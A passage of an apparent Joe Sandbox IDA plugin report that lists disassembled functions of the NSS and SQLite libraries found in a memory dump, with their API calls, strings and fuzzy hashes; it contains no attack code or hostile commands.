PL_FreeArenaPool.NSS3(?), ref: 6C82ED95
PL_FinishArenaPool.NSS3(?), ref: 6C82ED9D

Part of subcall function 6C8464F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C84127C,00000000,00000000,00000000), ref: 6C84650E

Strings

security, xrefs: 6C82ED06

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 9548467dbc45e7495e54226dfad74bbe4976aa100ebbab92195cb6609609927d
Instruction ID: c86c61f5ced4eda07a1277863b4e2a5afb404a80c6b4e3ced9be5da7e5f0cf94
Opcode Fuzzy Hash: 9548467dbc45e7495e54226dfad74bbe4976aa100ebbab92195cb6609609927d
Instruction Fuzzy Hash: B2110B7590021C6BDB30977DAE48BBB72746F4270EF044D34E845A2F81F729954897DA

Uniqueness

Uniqueness Score: -1.00%

Function 6C812CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C812CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C812D07

Part of subcall function 6C8F09D0: PR_Now.NSS3 ref: 6C8F0A22
Part of subcall function 6C8F09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C8F0A35
Part of subcall function 6C8F09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C8F0A66
Part of subcall function 6C8F09D0: PR_GetCurrentThread.NSS3 ref: 6C8F0A70
Part of subcall function 6C8F09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C8F0A9D
Part of subcall function 6C8F09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C8F0AC8
Part of subcall function 6C8F09D0: PR_vsmprintf.NSS3(?,?), ref: 6C8F0AE8
Part of subcall function 6C8F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C8F0B19
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C8F0B48
Part of subcall function 6C8F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C8F0C76
Part of subcall function 6C8F09D0: PR_LogFlush.NSS3 ref: 6C8F0C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C812D22

Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C8F0B88
Part of subcall function 6C8F09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8F0C5D
Part of subcall function 6C8F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C8F0C8D
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0C9C
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C8F0CD1
Part of subcall function 6C8F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C8F0CEC
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0CFB
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C8F0D16
Part of subcall function 6C8F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C8F0D26
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0D35
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C8F0D65
Part of subcall function 6C8F09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C8F0D70
Part of subcall function 6C8F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C8F0D90
Part of subcall function 6C8F09D0: free.MOZGLUE(00000000), ref: 6C8F0D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C812D3B

Part of subcall function 6C8F09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C8F0BAB
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0BBA
Part of subcall function 6C8F09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C8F0D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C812D54

Part of subcall function 6C8F09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8F0BCB
Part of subcall function 6C8F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C8F0BDE
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(?), ref: 6C8F0C16

Strings

pLabel = 0x%p, xrefs: 6C812D4F
slotID = 0x%x, xrefs: 6C812D02
C_InitToken, xrefs: 6C812CE7
ulPinLen = %d, xrefs: 6C812D36
pPin = 0x%p, xrefs: 6C812D1D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 17fa1ea6defbfe733c766d338a9920209385762c99cbc7c9ec59d98982468e10
Instruction ID: 2819ae9bd75724059e7de947393a8735412c9076d96f5be841afd9e5eab588cb
Opcode Fuzzy Hash: 17fa1ea6defbfe733c766d338a9920209385762c99cbc7c9ec59d98982468e10
Instruction Fuzzy Hash: 5D21B075709149EFDB20AB58DE4CA493BF1FB8631EF148924E50497A22DB34D909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C7D2357), ref: 6C8F0EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C7D2357), ref: 6C8F0EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C8F0EE6

Part of subcall function 6C8F09D0: PR_Now.NSS3 ref: 6C8F0A22
Part of subcall function 6C8F09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C8F0A35
Part of subcall function 6C8F09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C8F0A66
Part of subcall function 6C8F09D0: PR_GetCurrentThread.NSS3 ref: 6C8F0A70
Part of subcall function 6C8F09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C8F0A9D
Part of subcall function 6C8F09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C8F0AC8
Part of subcall function 6C8F09D0: PR_vsmprintf.NSS3(?,?), ref: 6C8F0AE8
Part of subcall function 6C8F09D0: EnterCriticalSection.KERNEL32(?), ref: 6C8F0B19
Part of subcall function 6C8F09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C8F0B48
Part of subcall function 6C8F09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C8F0C76
Part of subcall function 6C8F09D0: PR_LogFlush.NSS3 ref: 6C8F0C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C8F0EFA

Part of subcall function 6C7DAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C7DAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C8F0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C8F0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C8F0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C8F0F2B

Strings

Aborting, xrefs: 6C8F0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C8F0ED9, 6C8F0EE5, 6C8F0F06, 6C8F0F0B

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: bc2ffc2ae507beec9caf1c083ae6399809c8642d72b711cc102363bb99f0c13d
Instruction ID: c73e2b45e2500a24feb467f4dc6228227d506803f3a4cb12bdb4ecfc175e20e4
Opcode Fuzzy Hash: bc2ffc2ae507beec9caf1c083ae6399809c8642d72b711cc102363bb99f0c13d
Instruction Fuzzy Hash: 9DF0A4BA9002287BDB123B60DC4AC9B3E3DEF82268F004424FD1D56602EB35E91496B2

Uniqueness

Uniqueness Score: -1.00%

Function 6C854DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C854DCB

Part of subcall function 6C840FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7E87ED,00000800,6C7DEF74,00000000), ref: 6C841000
Part of subcall function 6C840FF0: PR_NewLock.NSS3(?,00000800,6C7DEF74,00000000), ref: 6C841016
Part of subcall function 6C840FF0: PL_InitArenaPool.NSS3(00000000,security,6C7E87ED,00000008,?,00000800,6C7DEF74,00000000), ref: 6C84102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C854DE1

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C854DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C854E59

Part of subcall function 6C83FAB0: free.MOZGLUE(?,-00000001,?,?,6C7DF673,00000000,00000000), ref: 6C83FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C91300C,00000000), ref: 6C854EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C854EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C854F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C85521A

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: b8b4bf86fd1a10a9258d2c393628c505abcc4782fc5e3a2978e2db2cd9383d9b
Instruction ID: 5d39439f96d756803e24d0fcfd6348f47212d5b3cf62a035fbb27d5b8823b252
Opcode Fuzzy Hash: b8b4bf86fd1a10a9258d2c393628c505abcc4782fc5e3a2978e2db2cd9383d9b
Instruction Fuzzy Hash: 78F1CD71E00209CBDB54CF58D9407AEB7B2FF84318F658529E815AB780E7B5E9A1CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C850C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C852C2A), ref: 6C850C81

Part of subcall function 6C83BE30: SECOID_FindOID_Util.NSS3(6C7F311B,00000000,?,6C7F311B,?), ref: 6C83BE44

Part of subcall function 6C828500: SECOID_GetAlgorithmTag_Util.NSS3(6C8295DC,00000000,00000000,00000000,?,6C8295DC,00000000,00000000,?,6C807F4A,00000000,?,00000000,00000000), ref: 6C828517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C850CC4

Part of subcall function 6C83FAB0: free.MOZGLUE(?,-00000001,?,?,6C7DF673,00000000,00000000), ref: 6C83FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C850CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C850D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C850D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C850D7D
free.MOZGLUE(00000000), ref: 6C850DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C850DC1
free.MOZGLUE(00000000), ref: 6C850DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C850E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C850E0F

Part of subcall function 6C8295C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C807F4A,00000000,?,00000000,00000000), ref: 6C8295E0
Part of subcall function 6C8295C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C807F4A,00000000,?,00000000,00000000), ref: 6C8295F5
Part of subcall function 6C8295C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C829609
Part of subcall function 6C8295C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C82961D
Part of subcall function 6C8295C0: PK11_GetInternalSlot.NSS3 ref: 6C82970B
Part of subcall function 6C8295C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C829756
Part of subcall function 6C8295C0: PK11_GetIVLength.NSS3(?), ref: 6C829767
Part of subcall function 6C8295C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C82977E
Part of subcall function 6C8295C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C82978E

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: 8148493e46a868f2da7ba49751967d2975916f36fed39a5858d5e746562bd5b3
Instruction ID: 5759d2f46352ef2891947fd41ff818864754b033f5644c3757460a3c9158215b
Opcode Fuzzy Hash: 8148493e46a868f2da7ba49751967d2975916f36fed39a5858d5e746562bd5b3
Instruction Fuzzy Hash: 8D4126B1900219ABEB209F68DE45BAF7674EF0030DF100934ED1957741F775AA28CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C782E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C782F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C782FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C783005
memcpy.VCRUNTIME140(?,?,?), ref: 6C7830EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C783131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C783178

Strings

%s at line %d of [%.10s], xrefs: 6C783171
database corruption, xrefs: 6C78316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C783022, 6C783156, 6C783162, 6C78318A, 6C783196, 6C7831A2, 6C7831AE, 6C7831BA, 6C7831C6

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 4aab400ba1f8a780af21f3dd7a9c40f2adc66a08bf404cb231cacb5529f4794e
Instruction ID: 0af9e3854ab15598e9168d449d0cc13fb1574ff032d1c4b39802686a8c1815e1
Opcode Fuzzy Hash: 4aab400ba1f8a780af21f3dd7a9c40f2adc66a08bf404cb231cacb5529f4794e
Instruction Fuzzy Hash: E4B1C2B0E06219DBCB18CF9DC984AEEB7B2BF48704F144439EA49B7B45D7749941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C762400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C7624EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C762315), ref: 6C76254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C762315), ref: 6C76256C

Strings

bind on a busy prepared statement: [%s], xrefs: 6C7624E6
API called with finalized prepared statement, xrefs: 6C762543, 6C76254D
API called with NULL prepared statement, xrefs: 6C76253C
%s at line %d of [%.10s], xrefs: 6C762566
misuse, xrefs: 6C762561
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7624F4, 6C762557

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: b0e48b26a41e2d65007032a1137fcdd250fdb740ae3703ada43ebde7307fbb15
Instruction ID: 2dd58d00b11f59ea0ad19f99e2103e9d1a91cb7f1dbdff8fe745358c2cebc8e4
Opcode Fuzzy Hash: b0e48b26a41e2d65007032a1137fcdd250fdb740ae3703ada43ebde7307fbb15
Instruction Fuzzy Hash: AA412471A08600CBE7648F1AE99CBA677A6AF81319F24493CEC194FF41D736EC05C791

Uniqueness

Uniqueness Score: -1.00%

Function 6C766600 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 95COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,NULL), ref: 6C766C66
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0001F490,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C766C83

Strings

API call with %s database connection pointer, xrefs: 6C766C60
%s at line %d of [%.10s], xrefs: 6C766C7D
misuse, xrefs: 6C766C78
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C766C6E
unopened, xrefs: 6C766C9F
NULL, xrefs: 6C766C55, 6C766C5F
invalid, xrefs: 6C766C95

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 632333372-4248800309
Opcode ID: 313c0ee8ad26642f84e35c050796a55807ab0a96471233d1561e69113b1385c5
Instruction ID: cf744f00293cf0798178c8bdb7cbc86a8b27e6cd4af601dede8d5cfb2c6a648d
Opcode Fuzzy Hash: 313c0ee8ad26642f84e35c050796a55807ab0a96471233d1561e69113b1385c5
Instruction Fuzzy Hash: 68313A71A082049BEB108E6B9E457AB3BA6EB8131CF544238DD1DDBF84E734EA4587D1

Uniqueness

Uniqueness Score: -1.00%

Function 6C816C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C816C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C816C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C816CA3

Part of subcall function 6C8FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C8FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C816CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C816CD5

Strings

(CK_INVALID_HANDLE), xrefs: 6C816C9C
C_DigestInit, xrefs: 6C816C61
hSession = 0x%x, xrefs: 6C816C7E, 6C816C8E
pMechanism = 0x%p, xrefs: 6C816CD0

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
API String ID: 1003633598-3690128261
Opcode ID: 6cb9d69f68fd5b6078451fcb86ce2f2766b9eb123890c3d0a693590e026c80df
Instruction ID: 674e0fca3c9dae0a1d9d3bdd536fffad69e84a50129acccbe476a0440b49b97a
Opcode Fuzzy Hash: 6cb9d69f68fd5b6078451fcb86ce2f2766b9eb123890c3d0a693590e026c80df
Instruction Fuzzy Hash: 8621D531B09105DBDB20AB589F48B9A37F5EB8621DF158839E549D7F02DB309909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7E0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7E0F84

Part of subcall function 6C83B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9118D0,?), ref: 6C83B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C7FF59B,6C90890C,?), ref: 6C7E0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C7E0FC1

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
